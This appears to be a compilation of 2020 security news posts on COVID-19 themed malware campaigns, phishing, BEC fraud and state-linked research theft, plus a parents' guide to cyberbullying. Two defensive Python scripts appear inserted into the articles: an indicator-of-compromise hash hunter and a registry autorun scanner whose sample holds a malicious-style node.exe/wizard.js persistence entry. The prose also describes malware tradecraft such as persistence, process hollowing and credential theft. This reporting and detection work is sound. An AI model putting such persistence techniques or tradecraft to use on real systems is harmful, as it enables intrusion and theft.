“This malware downloader utilizes cloud hosting services like Microsoft OneDrive or Google Drive to keep its payload encrypted. Also, GuLoader is used to download Remote Access Trojan (RAT) or files that allow attackers to control, monitor, or steal information on the infected machine.” reads the analysis.

The malware implements anti-analysis techniques, such as anti-debugging checks. To achieve persistence, GuLoader creates a folder in which to place a copy of itself and modifies a registry key.

The loader then uses process hollowing: a child process downloads, decrypts, and maps the payload into memory.

Common payloads downloaded by the loader are Formbook, NetWire, Remcos, Lokibot, and others.

The analysis published by Vipre Labs includes technical details about the threats, including Indicators of Compromise (IoCs).

In early March, experts at MalwareHunterTeam uncovered a COVID-19-themed campaign that was distributing the GuLoader malware to deliver the FormBook information-stealing Trojan.

The campaign was using emails that pretend to be sent by members of the World Health Organization (WHO).

Pierluigi Paganini

(SecurityAffairs – COVID-19, malspam)

The post Experts observed a spike in COVID-19 related malspam emails containing GuLoader appeared first on Security Affairs.

Silent Night Zeus botnet available for sale in underground forums

Experts reported the existence of a botnet, tracked as Silent Night and based on the Zeus banking Trojan, that is available for sale in several underground forums.

This week researchers from Malwarebytes and HYAS published a report that included technical details on a recently discovered botnet, tracked as Silent Night, being distributed via the RIG exploit kit and COVID-19 malspam campaigns.


The source code of the Zeus Trojan has been available in the cybercrime underground since 2011, allowing crooks to develop their own variants ever since.

Experts found multiple variants in the wild, many of them belonging to the Terdot Zbot/Zloader malware family.

The name “Silent Night” is likely a reference to a weapon mentioned in the 2002 movie xXx. The Zbot variant was first spotted in November 2019, when a seller named “Axe” started offering it on the Russian underground forum forum.exploit[.]in.

Axe advertised the Trojan as the result of over five years of work, with roughly 15,000 hours spent on developing the malicious code.

“The author described it as a banking Trojan designed with compatibility with Zeus webinjects. Yet, he claims that the code is designed all by him, based on his multiple years of experience – quote: “In general, it took me 5+ years to develop and support the bot, on average about 15k ~ hours were spent.”” reads the report published by the researchers.

The botnet goes for $4,000 per month for a custom build or $2,000 per month for a general build; HVNC functionality costs an extra USD 1,000 per month, and a 14-day test of the code costs USD 500.

Experts believe that Axe is also the developer of Axe Bot 1.4.1: comparing the C2 source code of Axe Bot 1.4.1 and Zloader 1.8.0, they noted that all of the custom PHP functions carry the prefix CSR, which could be either a namespace or a developer’s handle.

Silent Night is able to grab information from online forms and perform web injections in major browsers (Google Chrome, Mozilla Firefox, and Internet Explorer), monitor keystrokes, take screenshots, and harvest cookies and passwords.

Silent Night leverages web injections to hijack a user’s session and redirect them to malicious domains, or to grab the login credentials for online banking services. Data collected by the malware is then transferred to the operator’s command-and-control (C2) server.

The malware is able to infect all operating systems.

The seller also claims to use an original obfuscator; decryption is performed only “on demand.” Analysis of the contents of an open directory on the command-and-control server allowed the researchers to discover a manual for bot operators that includes instructions for setting up the malware.

On Dec 23, 2019, this variant of Zloader was observed being distributed by the RIG Exploit Kit in small campaigns, likely for testing purposes. Spreading intensified over time; in March 2020, it was delivered in a COVID-19-themed spam campaign using weaponized Word documents.

“The design of Silent Night is consistent and clean, the author’s experience shows throughout the code. Yet, apart from the custom obfuscator, there is not much novelty in this product. The Silent Night is not any game changer, but just yet another banking Trojan based on Zeus.” concludes the report. “Based on the analysis of the bot’s configurations, we may confidently say that there is more than one customer of the “Silent Night”.”

Pierluigi Paganini

(SecurityAffairs – Silent Night, hacking)

The post Silent Night Zeus botnet available for sale in underground forums appeared first on Security Affairs.

Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

Researchers from the Microsoft Security Intelligence team provided some details on a new massive phishing campaign using COVID-19 themed emails.

The messages used weaponized Excel documents; the IT giant observed a spike in the number of malicious documents in malspam campaigns that use Excel 4.0 macros.

“For several months now, we’ve been seeing a steady increase in the use of malicious Excel 4.0 macros in malware campaigns. In April, these Excel 4.0 campaigns jumped on the bandwagon and started using COVID-19 themed lures.” states Microsoft in a Tweet.

The latest COVID-19 campaign began in April; the messages purport to be from the Johns Hopkins Center and use an Excel attachment. Once the attachment is opened, it shows a graph of Coronavirus cases in the United States and tricks the victims into enabling macros, which starts the infection.

The macros drop a remote access tool (RAT) named NetSupport Manager, a legitimate application that is abused by attackers to take control of victim systems.

“The hundreds of unique Excel files in this campaign use highly obfuscated formulas, but all of them connect to the same URL to download the payload. NetSupport Manager is known for being abused by attackers to gain remote access to and run commands on compromised machines.” continues Microsoft.

The NetSupport RAT employed in this COVID-19-themed campaign also drops multiple components, including several .dll, .ini, and other .exe files, a VBScript, and an obfuscated PowerSploit-based PowerShell script. It then connects to a command-and-control server, allowing threat actors to send further commands.

Below are the Indicators of Compromise (IoCs) shared by Microsoft:

Below is a list of recommendations to avoid this threat:

  • Keep your anti-virus software up to date.
  • Search for existing signs of the threat using IoCs in your environment.
  • Keep applications and operating systems running and up to date.
  • Be vigilant with attachments and links in emails.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Microsoft warns of “massive campaign” using COVID-19 themed emails appeared first on Security Affairs.

COVID-19 is driving diverging perspectives as enterprises decide which technologies to focus on

Technology executives, C-suite leaders and senior executives in areas such as IoT, DevOps, security, and embedded development—from both the U.S. and China are realigning their focus during the COVID-19 pandemic, Wind River reveals. Seismic events can disrupt our focus and thinking and force reassessment of drivers of future business success. The current pandemic is one of those major events producing a worldwide impact, especially given its reverberations on the two largest global economies, the U.S. … More

The post COVID-19 is driving diverging perspectives as enterprises decide which technologies to focus on appeared first on Help Net Security.

Adam Levin Discusses Covid-19 Scams on CNBC

Adam Levin was featured on CNBC where he discussed how the Covid-19 pandemic has created an ideal environment for scammers.

“We are working with our children and home schooling. We’re sharing devices with our children. We’re trying to juggle work and family. But to a hacker, we are their day job,” said Levin.

The post Adam Levin Discusses Covid-19 Scams on CNBC appeared first on Adam Levin.

With the threat landscape continuously changing, businesses must be ready for anything

Despite efforts by organizations to layer up their cyber defenses, the threat landscape is changing, and attackers are innovating and automating their attacks, NTT reveals. Referencing the COVID-19 pandemic, the report highlights the challenges that businesses face as cyber criminals look to gain from the global crisis, and the importance of secure-by-design and cyber-resilience. The attack data indicates that 55% of all attacks in 2019 were a combination of web-application and … More

The post With the threat landscape continuously changing, businesses must be ready for anything appeared first on Help Net Security.

Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

Spear-phishing is a rapidly emerging threat. It’s more specific than generic phishing attempts and often targets a single person or company. Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers. 

Cybercriminals Capitalizing on the Chaos

The coronavirus is forcing companies in most industries to operate substantially differently. Many may find it takes time to adjust to the changes. Others do not immediately have the resources for a major shift, such as having all employees work remotely. 

A related concern is that COVID-19 is both a new and anxiety-inducing issue. People want to learn as much as they can about it, and their haste may result in them clicking on links without thinking. Cybercriminals view these conditions as ideal for orchestrating their attacks. Data from Barracuda cybersecurity researchers identified a 667% increase in spear-phishing attacks between the end of February and the following month. 

Real-Life Examples of Spear-Phishing Attacks in the Energy Production Sector

The threat of spear-phishing for energy companies is, unfortunately, not a theoretical one. Coverage published in late April by Bitdefender illuminated a carefully executed attack. The research team found evidence of a campaign occurring March 31, whereby hackers impersonated a well-known engineering company with experience in on- and off-shore energy projects. 

The messages — which did not include many of the telltale signs of phishing like spelling and grammatical errors — asked recipients to submit equipment and materials bids for the Rosetta Sharing Facilities Project. Participants would do so on behalf of Burullus, a gas joint venture partially owned by another Egyptian state oil brand. 

The emails also contained two attachments, which were supposedly bid-related forms. Downloading them infected a user’s system with a type of trojan spyware not previously seen in other utilities industry cyberattacks. The effort targeted oil companies all over the world, from Malaysia to South Africa, in a single day. 

Bitdefender’s research team also uncovered a more geographically specific spear-phishing attempt to target the gas sector on April 12. It centered on a relatively small number of shipping companies based in the Philippines. The emails asked them to send details associated with an oil tanker vessel and contained industry-specific language. This spear-phishing campaign occurred over two days. 

The cybersecurity experts who studied these attacks stressed that, since the messages contained accurate details about real companies and events in the oil industry, the attackers had taken the time to do research in order to craft maximally convincing content.

Hackers Love Causing Severe Disruptions

Why are cyberattacks in the energy industry suddenly on the rise? One reason may stem from the way hackers often deploy tactics to cause tremendous harm to necessary services. The oil industry operates on a vast scale. For example, a company specializing in oil and gas exploration planned as much as 300,000 feet of total footage for drilling in one region during 2018. 

The ability to get such impressive outcomes undoubtedly helps oil companies. The increased scale also may make it more necessary to safeguard against cyberattacks, especially as criminals look for ways to cause the most damage. Another recent incident, announced in a United States government alert on February 18, shut down a natural gas compression facility. Operations stopped for two days, causing losses in productivity and revenue. 

Although the publication did not name the energy company, it mentioned that the hackers relied on spear-phishing to obtain the credentials necessary for entering the business’s information technology (IT) network. They then used that access to wreak havoc on the enterprise’s operational technology infrastructure.

Not a New Concern

Utilities industry cyberattacks have long worried cybersecurity analysts. If concentrated efforts from hackers shut down the electric grid, the effects could be long-lasting and hit virtually every industry and consumer in the affected areas. The risks to the energy sector began before the coronavirus pandemic, too. 

In November 2019, cybersecurity publications discussed a ransomware attack on Petróleos Mexicanos, Mexico’s largest oil and gas company. The perpetrators asked for 562 bitcoins to restore the data. The affected enterprise did not comply, and it had important data backed up. 

Toll Group, an Australian transportation and logistics company with oil and gas companies as clients, suffered a ransomware attack this spring. It was the second such issue in four months, with the first happening in February. 

The Energy Industry Must Remain Vigilant

The challenges posed by COVID-19 and its effect on oil prices may make the respective parties feel the impacts of cyberattacks in the energy industry more acutely. An ideal aim is to prevent those events rather than dealing with the damage afterward. Paying attention to cybersecurity vulnerabilities can help companies make meaningful gains and stay protected.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Hackers Target Oil Producers During COVID-19 Slump appeared first on Security Affairs.

Mental Health Awareness Week: Coping with cybersecurity pressures amidst a global pandemic

As most of the UK’s cybersecurity workforce now sits at home isolated while carrying out an already pressurised job, there is every possibility that this could be affecting their mental health. In light of Mental Health Awareness Week, and as the discussion around employee wellbeing becomes louder and louder amidst the COVID-19 pandemic, we spoke with five cybersecurity experts to get their thoughts on how organisations can minimise the negative mental and physical impacts on … More

The post Mental Health Awareness Week: Coping with cybersecurity pressures amidst a global pandemic appeared first on Help Net Security.

International Fraud Ring Stealing Unemployment Funds

Several state governments have been targeted by a sophisticated fraud campaign that has likely siphoned millions of dollars in unemployment payments earmarked for the record number of Americans seeking benefits as a result of the pandemic, a new Secret Service memo warns.

According to an internal memo, a group of Nigeria-based criminals has been filing phony unemployment claims in multiple states using personally identifiable information (PII), specifically stolen or compromised Social Security numbers. The information being used was most likely procured through various forms of identity theft and/or known data breaches and compromises.

“It is assumed the fraud ring behind this possesses a substantial PII database to submit the volume of applications observed thus far,” stated the memo.

The fraud campaign comes in the wake of a massive increase in unemployment as a result of the Covid-19 pandemic. State unemployment offices are vulnerable to this kind of fraud as they scramble to get funds to Americans in need as quickly as possible.

The Secret Service has identified Washington as the primary target of the fraud campaign, but has seen “evidence of attacks in North Carolina, Massachusetts, Rhode Island, Oklahoma, Wyoming, and Florida,” according to the memo. 

The post International Fraud Ring Stealing Unemployment Funds appeared first on Adam Levin.

Security and the rapidly growing importance of mobile apps

Organizations are under more pressure than ever before to rapidly produce both new apps and updates to existing apps, not only because it’s essentially the only way they can interact with their customers, but also because there will be a flood of new users who previously relied on physical locations to conduct their business. Continuous mobile development is now more critical than ever, and organizations must provide error-free, engaging user experiences. In the rush to … More

The post Security and the rapidly growing importance of mobile apps appeared first on Help Net Security.

Is Your Child Being Cyberbullied? What Parents Need to Know


In this season of social distancing, teens need their friends more than ever. Daily digital connection — through texting, video chat, social networks, and gaming — is critical to keeping friend groups strong. But could increased time online these days lead to an increase in cyberbullying?

While there isn’t data to answer that question definitively, it wouldn’t be surprising for parents to notice some signs of conflict surface as the months continue to creep by. And, with re-open dates for schools in limbo, it’s more important than ever to keep the family safety conversation humming.

For clarity: Allowing more screen time doesn’t mean more cyberbullying or conflict is certain to occur. However, experience has taught us that more screen time does increase the potential for digital conflict.

Social and Emotional Fallout

This unprecedented health event hasn’t been easy on anyone, but kids especially are likely to be holding onto some big emotions about it. A recent Common Sense Media study confirms that social media has been key to helping kids get through this crisis, but one in four kids surveyed feels “more lonely than usual.”

The school year with its milestones — proms, graduations, dates, parties — ended abruptly. It’s logical to assume these losses have sparked feelings of sadness, anger, frustration, and anxiety. And because online is where most kids connect with peers, these emotions can easily play out there in the form of aggressive behavior, conflict, or persistent drama.

Digital Awareness


So how do you know if your child is being cyberbullied or dealing with conflict online? It isn’t always easy simply because so many kids won’t admit to being bullied. Often they believe telling an adult will make the harassment worse. They may feel ashamed or embarrassed about a regretful situation or the fact that they’re being targeted in the first place. For that reason, one of the best ways to help your child is to be aware of the time they spend online, the people they connect with, and how those digital circles impact their wellbeing.

What to Look For

The many forms of cyberbullying continue to evolve alongside the digital culture. Here are just a few ways kids bully one another.

  • Saying hurtful or intimidating things to someone on social media, a text, or email.
  • Making negative comments about a person’s sexuality, race, religion, handicaps, or physical features.
  • Camouflaging hurtful or threatening comments with words like “jk” (just joking).
  • Asking online friends to vote for or against another person, with Instagram polls or captions such as “Is this person hot or not?” or “Would you go out with this person?”
  • Posting or sharing with others the private photos, memes, emails, texts, or secrets without the permission of another person.
  • Intentionally posting unflattering or embarrassing photos of another person.
  • Spreading rumors or false information about another person online.
  • Making any threat to another person no matter how harmless you think it may be.

Signs of Cyberbullying

If your child is getting bullied online, there are some potential signs.

  • Anxious or upset after reading a text, frequently gets sick or nauseous, declines invitations from friends, or bows out of fun family outings.
  • Trouble sleeping or being withdrawn or moody.
  • Being protective of his or her phone, deleting or deactivating social networks
  • Sudden loss of a steady friend group or sudden complaining about once-loved friends.
  • Loss of interest in favorite sports or hobbies or a decline in grades.
  • References to suicide, loneliness, and hopelessness (when severe bullying is taking place).

Know Where They Go

Another way to understand your child’s emotional connection to his or her digital communities is to learn about their favorite platforms and monitor them. Pay specific attention to the tone of his or her social threads. And, if you see concerning comments or posts, ask your child how you can help. If your child is using risky apps such as WhatsApp or Kik, which allow people to use them anonymously, discuss your concerns with your child. Some social networks are more conducive to cyberbullying than others.

Monitor Gaming Communities

Gaming time can skyrocket during the summer, and when games get competitive, cyberbullying can happen. Spend time with your child while he or she is gaming. Listen to the tone of the conversations and be aware of your child’s demeanor. For your child’s physical and emotional health, make every effort to set gaming limits as summer approaches.

Parenting Moves to Avoid

Bullying experts will tell you that what you don’t do if your child is getting bullied is often as important as what you do. Here’s some insight:

1) Never advise a child to ignore the bullying.
2) Never blame a child for being bullied even if he or she did something to aggravate the bullying. No one deserves to be bullied.
3) As angry as you feel that someone is bullying your child, do not encourage your child to fight back physically.
4) Don’t overreact; escalate accordingly. If you can identify the bully, consider talking with the child’s parents.
5) Don’t lead the charge. Give your child veto power over your involvement. If they say they don’t want you to get involved (unless you suspect physical danger or suicide), respect that.
6) If the bullying continues to escalate, report it, and seek help from school counselors or the police if necessary.
7) Even if you are fearful, don’t take your child’s digital devices away. He or she didn’t do anything wrong.

Online Resources

A number of organizations are leading the charge against cyberbullying and have fantastic resources for families. Here are just a few: Cyberbullying Research Center, StopBullying.gov, StompOutBullying.org, KindCampaign.com, ItGetsBetter.org, National Bullying Prevention Center. If you’d like your organization added to this list, please leave a comment.

We hope you and your family are staying healthy these days and finding some time to talk about online safety. If you need a refresher, read Part I and Part II of our Online Safety Basics series. And, if you’re looking for a fun school lesson for the day, you can always quiz your kids on any of McAfee’s Family Safety content!

The post Is Your Child Being Cyberbullied? What Parents Need to Know appeared first on McAfee Blogs.

Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

While the number of Coronavirus-themed attacks continues to increase, Microsoft announced it is open-sourcing its COVID-19 threat intelligence to help organizations repel these threats.

“Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack.” reads a post published by Microsoft. “Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions. “

Sharing information could offer the community a more complete view of attackers’ tactics, techniques, and procedures.

Microsoft experts have already been sharing examples of malicious lures and have provided guided hunting of COVID-themed attacks through Azure Sentinel Notebooks.


Microsoft is going to publicly release some of its threat indicators; the company pointed out that its users are already protected against these attacks by Microsoft Threat Protection (MTP).

Microsoft has made the indicators available both in the Azure Sentinel GitHub repo and through the Microsoft Graph Security API.

“These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.” continues Microsoft.

“This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.”

This is just the beginning of the sharing of Coronavirus-related IoCs, which will continue to be offered through the peak of the outbreak.

Microsoft is releasing file hash indicators related to malicious email attachments employed in the campaigns. 

Azure Sentinel customers can import the indicators using a Playbook or access them directly from queries. Microsoft added that both Office 365 ATP and Microsoft Defender ATP already block the attacks associated with the above indicators.
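The “search for existing signs of the threat using IoCs in your environment” recommendation in the Microsoft campaign post above, and the file-hash indicators described here, can be put into practice with a small hunting script. The following Python is an added example, not code from Microsoft or from the Azure Sentinel repository: it loads a CSV indicator feed, hashes every file under a directory and reports matches. The CSV column names, the scratch files and the feed rows are constructed assumptions (the real feed has its own schema, and no genuine malware hash appears here; the matching row is derived from a harmless constructed file).

```python
import csv
import hashlib
import io
import os
import tempfile

# Constructed feed layout (assumption: the published Azure Sentinel feed uses its
# own column names). One indicator per row.
FEED_HEADER = "indicator_type,indicator_value,description"


def load_indicators(feed_text):
    """Parse a CSV indicator feed into {indicator_type: {value: description}}.

    Values are lower-cased so that upper-case hashes in a feed still match the
    lower-case hex digests that hashlib produces.
    """
    indicators = {}
    for row in csv.DictReader(io.StringIO(feed_text)):
        itype = row["indicator_type"].strip().lower()
        value = row["indicator_value"].strip().lower()
        indicators.setdefault(itype, {})[value] = row.get("description", "").strip()
    return indicators


def sha256_file(path):
    """Hash a file in chunks so large attachments do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hunt_directory(directory, indicators):
    """Return (path, sha256, description) for every file whose hash is in the feed."""
    known = indicators.get("sha256", {})
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            file_hash = sha256_file(path)
            if file_hash in known:
                hits.append((path, file_hash, known[file_hash]))
    return sorted(hits)


def build_demo_environment():
    """Create a scratch directory with one 'matching' and one benign file, plus a
    constructed feed whose sha256 row is computed from the harmless stand-in file."""
    workdir = tempfile.mkdtemp(prefix="ioc_hunt_")
    lure = os.path.join(workdir, "covid19_cases.xlsm")
    benign = os.path.join(workdir, "notes.txt")
    with open(lure, "wb") as handle:
        handle.write(b"constructed stand-in for a COVID-19 themed Excel lure\n")
    with open(benign, "wb") as handle:
        handle.write(b"harmless text file\n")
    feed = "\n".join([
        FEED_HEADER,
        # upper-case on purpose: feeds mix cases, load_indicators normalises it
        f"sha256,{sha256_file(lure).upper()},constructed: COVID-19 themed Excel lure",
        "sha256," + "0" * 64 + ",constructed: placeholder hash with no local match",
        "url,http://example.invalid/placeholder,constructed: URL indicator (ignored by file hashing)",
    ]) + "\n"
    return workdir, feed


def run_demo():
    """Hunt the scratch directory and return (file name, description) per hit."""
    workdir, feed = build_demo_environment()
    hits = hunt_directory(workdir, load_indicators(feed))
    return [(os.path.basename(path), description) for path, _h, description in hits]


if __name__ == "__main__":
    for name, description in run_demo():
        print(f"MATCH {name}: {description}")
```

Pointing hunt_directory at a mail quarantine or a Downloads folder, with the feed text loaded from the published indicators, gives a quick offline check; the case normalisation matters in practice because feeds from different sources mix upper- and lower-case hex, and a URL or domain indicator row is simply skipped by a hash-based hunt rather than treated as an error.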

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post Microsoft is open-sourcing COVID-19 threat intelligence appeared first on Security Affairs.

QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in a Coronavirus-themed phishing campaign in which crooks promise victims COVID-19 tax relief.

Researchers uncovered a new malware dubbed QNodeService that was employed in a Coronavirus-themed phishing campaign. The operators behind the campaign use a COVID-19 lure promising victims tax relief.

The phishing messages carry a Trojan sample associated with a file named “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar”; experts from MalwareHunterTeam noticed that the malicious code was detected only by ESET AV.

The QNodeService Trojan is written in Node.js and is delivered through a Java downloader embedded in the .jar file, Trend Micro warns. 

“Running this file led to the download of a new, undetected malware sample written in Node.js; this trojan is dubbed as “QNodeService”.” reads the analysis published by Trend Micro.

“The use of Node.js is an unusual choice for malware authors writing commodity malware, as it is primarily designed for web server development, and would not be pre-installed on machines likely to be targeted. However, the use of an uncommon platform may have helped evade detection by antivirus software.”

QNodeService is able to perform a broad range of activities, such as downloading, uploading and executing files, stealing credentials from the Chrome and Firefox browsers, and performing file management. The malware can also steal system information including IP address and location, download additional malware payloads, and exfiltrate stolen data. The current malware only targets Windows systems, but experts believe that its developers are working to make it a cross-platform threat.

The Java downloader embedded in the bait document is obfuscated with Allatori; it downloads the Node.js malware file (either “qnodejs-win32-ia32.js” or “qnodejs-win32-x64.js”) and a file called “wizard.js.”

Either a 32-bit or 64-bit version of Node.js is dropped depending on the Windows system architecture of the target machine. 

The wizard.js file is an obfuscated JavaScript (Node.js) file used to achieve persistence by creating a “Run” registry key entry and to download another malicious payload.
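Because wizard.js survives reboots through a Run key, the defensive counterpart is a review of autorun entries for script hosts that do not belong there. The following Python is an added example, not Trend Micro’s code and not part of the malware analysis: it parses the text of a reg export of the Run keys and flags entries that launch a Node.js interpreter or a .js file. The exported sample, the value name “Wizard”, the user name and the paths are constructed assumptions; only the wizard.js file name comes from the report.

```python
import re

# Constructed sample of a 'reg export' of the per-user and machine-wide Run keys.
# The value name "Wizard", the user "alice" and every path are assumptions for this
# demonstration; only the file name wizard.js is taken from the analysis.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Wizard"="\"C:\\Users\\alice\\AppData\\Roaming\\node.exe\" \"C:\\Users\\alice\\AppData\\Roaming\\wizard.js\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
'''

KEY_LINE = re.compile(r'^\[([^\]]+)\]$')
# "name"=data  or  @=data (the key's default value)
VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')
# REG_SZ data is a quoted string; hex:/dword: payloads are not autorun commands
STRING_DATA = re.compile(r'^"((?:[^"\\]|\\.)*)"$')


def _unescape(text):
    # .reg files escape a backslash as \\ and a double quote as \"
    return re.sub(r'\\(.)', r'\1', text)


def parse_reg_export(text):
    """Yield (key_path, value_name, string_data) for every REG_SZ value in a .reg export."""
    current_key = None
    for raw in text.splitlines():
        line = raw.strip()
        key_match = KEY_LINE.match(line)
        if key_match:
            current_key = key_match.group(1)
            continue
        value_match = VALUE_LINE.match(line)
        if value_match is None or current_key is None:
            continue
        name = "(Default)" if value_match.group(2) else _unescape(value_match.group(1))
        data_match = STRING_DATA.match(value_match.group(3))
        if data_match is None:
            continue
        yield current_key, name, _unescape(data_match.group(1))


def is_autorun_key(key_path):
    """True for the Run and RunOnce keys under any hive."""
    tail = key_path.lower().rsplit("\\", 1)[-1]
    return tail in ("run", "runonce")


def find_suspicious_run_entries(text):
    """Return autorun entries that start a Node.js host or execute a .js script."""
    findings = []
    for key, name, command in parse_reg_export(text):
        if not is_autorun_key(key):
            continue
        reasons = []
        if re.search(r'\bnode\.exe\b', command, re.IGNORECASE):
            reasons.append("launches a Node.js interpreter")
        if re.search(r'\.js\b', command, re.IGNORECASE):
            reasons.append("executes a .js script")
        if reasons:
            findings.append({"key": key, "name": name, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for entry in find_suspicious_run_entries(SAMPLE_REG_EXPORT):
        print(f"{entry['key']}\\{entry['name']}: {entry['command']}")
        for reason in entry["reasons"]:
            print(f"  - {reason}")
```

reg export writes UTF-16 files, so read a real export with open(path, encoding="utf-16") before passing its contents in. The same parser covers RunOnce, and an entry that launches node.exe or a .js file from a user profile directory is the kind of autorun a responder would pull for closer review, since a standard Windows workstation has no business starting a Node.js script at logon.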

One of the most interesting features implemented by QNodeService is support for an “http-forward” command, which allows attackers to download files without directly connecting to a victim’s PC.

“Of particular note is the http-forward command, which allows an attacker to download a file without directly connecting to the victim machine, as shown below in figures 13-16.” continues Trend Micro. “However, a valid request path and access token are required to access files on the machine. The C&C server must first send “file-manager/forward-access” to generate the URL and access token to use for the http-forward command later.”

Trend Micro researchers included Indicators of Compromise (IoCs) in their report.

Unfortunately, Coronavirus-themed attacks continue to target individuals, businesses, and organizations worldwide.

At the end of March, experts from IBM X-Force uncovered a hacking campaign employing the Zeus Sphinx malware that focused on government relief payments.

Operators were spreading it in a spam campaign aimed at stealing victims’ financial information; the spam messages sent to the victims claim to provide information related to the Coronavirus outbreak and government relief payments.

Researchers revealed that the malware is receiving constant upgrades to improve its capabilities. 

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post QNodeService Trojan spreads via fake COVID-19 tax relief appeared first on Security Affairs.

Criminals boost their schemes with COVID-19 themed phishing templates

Phishers are incessantly pumping out COVID-19 themed phishing campaigns and refining the malicious pages the targets are directed to. “Credential phishing attackers often tailor their email lures with themes they believe will be the most effective and use general websites for actual credential harvesting. The recent move to create custom COVID-19 payment phishing templates indicates that buyers view them as effective enough to warrant custom tactics to harvest credentials,” Proofpoint researchers have noted. The COVID-19 … More

The post Criminals boost their schemes with COVID-19 themed phishing templates appeared first on Help Net Security.

COVID-19 online fraud trends: Industries, schemes and targets

The telecommunications, retail and financial services industries have been increasingly impacted by COVID-19 online fraud, according to TransUnion. From a consumer perspective, Millennials have been most targeted by fraudsters using COVID-19 scams. Overall, the percent of suspected fraudulent digital transactions rose 5% from March 11 to April 28 when compared to Jan. 1 to March 10, 2020. More than 100 million risky transactions from March 11 to April 28 have been identified. “Given the billions … More

The post COVID-19 online fraud trends: Industries, schemes and targets appeared first on Help Net Security.

Educational organizations use cloud apps to share sensitive data outside of IT control

Many educational organizations are at risk of data security incidents during the current period of working from home and virtual learning, a Netwrix report reveals. Weak data security controls According to the survey, even before the COVID-19 pandemic, the majority of educational organizations had weak data security controls. In particular, 54% of IT professionals in the educational sector confessed that employees put data at risk by sharing it via cloud apps outside of IT knowledge. … More

The post Educational organizations use cloud apps to share sensitive data outside of IT control appeared first on Help Net Security.

Crooks stole $10 million from Norway’s state investment fund Norfund

Norway’s state investment fund, Norfund, suffered a business email compromise (BEC) attack in which hackers stole $10 million.

Hackers stole $10 million from Norway’s state investment fund, Norfund, in a business email compromise (BEC) attack.

Norfund is a private equity company established by the Norwegian Storting (parliament) in 1997 and owned by the Norwegian Ministry of Foreign Affairs. The fund receives its investment capital from the state budget.

The fraudsters compromised the Norfund email system and monitored communications between the employees of the fund and their partners for months.

Once they had identified the employee responsible for money transfers, the attackers created a Norfund email address to impersonate an individual authorized to transfer large sums of money through Norfund’s bank.

In a classic BEC scheme, hackers replaced the payment information provided to the partners to hijack the transfer to an account under their control in a bank in Mexico.

“Through an advance data breach, the defrauders were able to access information concerning a loan of USD 10 million (approx. 100 million NOK) from Norfund to a microfinance institution in Cambodia.” reads a notice published by Norfund.

“The defrauders manipulated and falsified information exchange between Norfund and the borrowing institution over time in a way that was realistic in structure, content and use of language. Documents and payment details were falsified.”

Norfund was not able to block the fraudulent wire transfer because the attackers managed to delay its discovery.

The BEC attack took place on March 16, but it was discovered more than a month later, on April 30, when the fraudsters attempted a new fraud that was detected and blocked.

To delay the discovery of the scam, the attacker sent an email to the Cambodian beneficiary informing it of a delay due to the current Coronavirus lockdown in Norway.

“This is a grave incident. The fraud clearly shows that we, as an international investor and development organisation, through active use of digital channels are vulnerable. The fact that this has happened shows that our systems and routines are not good enough. We have taken immediate and serious action to correct this” said company CEO, Tellef Thorleifsson.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Crooks stole $10 million from Norway’s state investment fund Norfund appeared first on Security Affairs.

China-linked hackers are attempting to steal COVID-19 Vaccine Research

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal COVID-19 vaccine research.

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal research related to treatments and vaccines for COVID-19.

“The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are issuing this announcement to raise awareness of the threat to COVID-19-related research. The FBI is investigating the targeting and compromise of U.S. organizations conducting COVID-19-related research by PRC-affiliated cyber actors and non-traditional collectors.” reads the joint alert. “These actors have been observed attempting to identify and illicitly obtain valuable intellectual property (IP) and public health data related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.”

“The F.B.I. and the Department of Homeland Security are preparing to issue a warning that China’s most skilled hackers and spies are working to steal American research in the crash effort to develop vaccines and treatments for the coronavirus. The efforts are part of a surge in cybertheft and attacks by nations seeking advantage in the pandemic.” reported The New York Times.

